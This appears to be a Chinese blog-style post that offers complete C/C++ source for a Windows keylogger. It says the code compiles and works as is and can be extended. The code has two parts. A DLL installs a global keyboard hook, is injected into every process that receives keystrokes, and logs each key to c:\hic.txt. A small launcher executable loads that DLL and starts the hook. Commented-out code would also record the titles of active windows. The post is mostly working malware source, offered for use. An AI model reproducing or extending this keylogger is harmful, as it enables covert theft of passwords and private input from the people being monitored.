|
|
这是个键盘记录模块,直接 编译可用,可以按需扩展。 预备知识:键盘记录功能需要用到全局键盘钩子(有局部钩子和全局钩子之分),而全局键盘钩子需要一个单独的dll文件,因为这个dll文件会被注入到任意获得键盘消息的进程中(个别系统进程无法注入),向操作系统注册钩子后,再在回调函数中处理对应的键盘事件就OK.... 另外,虽然dll也属可 执行文件,但它需要带头大哥的指引才能启动(exe文件),因此,还需要一个起动机,也就是一个exe文件来帮助启动... DLL头文件#ifndef _DLL_H_
#define _DLL_H_
#if BUILDING_DLL
# define DLLIMPORT __declspec (dllexport)
#else /* Not BUILDING_DLL */
# define DLLIMPORT __declspec (dllimport)
#endif /* Not BUILDING_DLL */
#include <windows.h>
DLLIMPORT void HelloWorld (void);
LRESULT CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam); //回调处理函数,
BOOL __declspec(dllexport) installhook(); //向系统安装钩子
BOOL __declspec(dllexport) UnHook(); //释放钩子
#endif /* _DLL_H_ */
DLL实现文件/* Replace "dll.h" with the name of your header */
#include "dll.h"
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma data_seg(".SHARDAT") //共享段
static HHOOK hkb = NULL;
//HWND hLastWnd = NULL;
FILE *fp = NULL; //注入不同进程dll文件共享一个文件,
#pragma data_seg()
#pragma comment (linker,"/SECTION:.SHARDAT,RWS")
HINSTANCE hinst = NULL;
DLLIMPORT void HelloWorld ()
{
MessageBox (0, "Hello World from DLL!\n", "Hi", MB_ICONINFORMATION);
}
// DLL入口
BOOL APIENTRY DllMain (HINSTANCE hInst /* Library instance handle. */ ,
DWORD reason /* Reason this function is being called. */ ,
LPVOID reserved /* Not used. */ )
{
switch (reason)
{
case DLL_PROCESS_ATTACH:
hinst = hInst;
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
/* Returns TRUE on success, FALSE on failure */
return TRUE;
}
LRESULT CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam) //回调函数,自己DIY吧...
{
/*
if(((DWORD)lParam&0x40000000) && (HC_ACTION==nCode))
{
switch(wParam)
{
case VK_F1:
MessageBox(NULL,"F1","F1",MB_OK); break;
case 'A':
MessageBox(NULL,"A","A",MB_OK);
}
}
*/
/*
HWND hWnd = GetActiveWindow();
if (hWnd != hLastWnd)
{
char szTemp[256] = {0};
GetWindowText(hWnd,szTemp,sizeof(szTemp));
fprintf(fp,"\r\n--- [%s] ---\r\n",szTemp);
hLastWnd = hWnd;
}
BYTE szKeyState[256] = {0};
GetKeyboardState(szKeyState);
int nScan = lParam >> 16;
WORD szKey = 0;
int len = ToAscii(wParam,nScan,szKeyState,&szKey,0);
if (len > 0)
{
//fprintf(fp,"[%c]",char(szKey));
}
*/
char ch;
if (((DWORD)lParam & 0x40000000) &&(HC_ACTION==nCode)) //捕获按键按下
{
if ((wParam==VK_SPACE)||(wParam==VK_RETURN)||(wParam>=0x2f ) &&(wParam<=0x100)) 判断按键类型
{
fp=fopen("c:\\hic.txt","a+");
if (wParam==VK_RETURN)
{
ch='\n';
fwrite(&ch,1,1,fp);
}
else
{
BYTE ks[256];
GetKeyboardState(ks);
WORD w;
UINT scan;
scan=0;
ToAscii(wParam,scan,ks,&w,0);
ch = (char)(w);
fwrite(&ch,1,1,fp);
}
fclose(fp);
}
}
LRESULT RetVal = CallNextHookEx( hkb, nCode, wParam, lParam );
return RetVal;
}
BOOL __declspec(dllexport)__stdcall installhook()
{
fp=fopen("c:\\hic.txt","w");
fclose(fp);
hkb=SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyboardProc,hinst,0); //键盘钩子
return TRUE;
}
BOOL __declspec(dllexport) UnHook()
{
BOOL unhooked = UnhookWindowsHookEx(hkb);
return unhooked;
}
EXE起动机头文件#ifndef _DLL_H_
#define _DLL_H_
#if BUILDING_DLL
# define DLLIMPORT __declspec (dllexport)
#else /* Not BUILDING_DLL */
# define DLLIMPORT __declspec (dllimport)
#endif /* Not BUILDING_DLL */
#include <windows.h>
DLLIMPORT void HelloWorld (void);
LRESULT CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam);
BOOL __declspec(dllexport) installhook();
BOOL __declspec(dllexport) UnHook();
#endif /* _DLL_H_ */
EXE起动机实现文件#include "dll.h"
#include <iostream>
#include <windows.h>
using namespace std;
typedef bool (*Fun)(); //函数指针
HMODULE g_hHook = 0;
Fun setHook = NULL;
int main(int argc, char *argv[])
{
//InstallHook();
g_hHook = LoadLibrary("Inject.dll");
setHook = (Fun)GetProcAddress(g_hHook,"installhook");
setHook();
system("pause");
return 0;
}
|
